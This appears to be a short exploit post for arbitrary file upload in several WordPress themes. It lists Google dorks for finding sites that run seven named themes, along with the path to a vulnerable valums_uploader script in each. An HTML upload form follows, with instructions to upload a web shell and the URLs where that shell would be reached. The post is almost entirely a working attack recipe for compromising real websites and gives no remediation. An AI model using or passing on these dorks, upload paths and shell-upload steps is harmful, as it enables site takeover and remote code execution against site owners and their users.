.Exploit Title:wordpress potential themes vuln upload

1.dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. dork: inurl:/wp-content/themes/blinc/
exploit:/framework/_scripts/valums_uploader/php.php

csrf from html:

<form enctype="multipart/form-data"
action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
it the url allows you to upload your shell then u can upload it or if it says any #Error then find another one
shell link==>
http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
http://www.yourtarget.com/wp-content/uploads/shell.php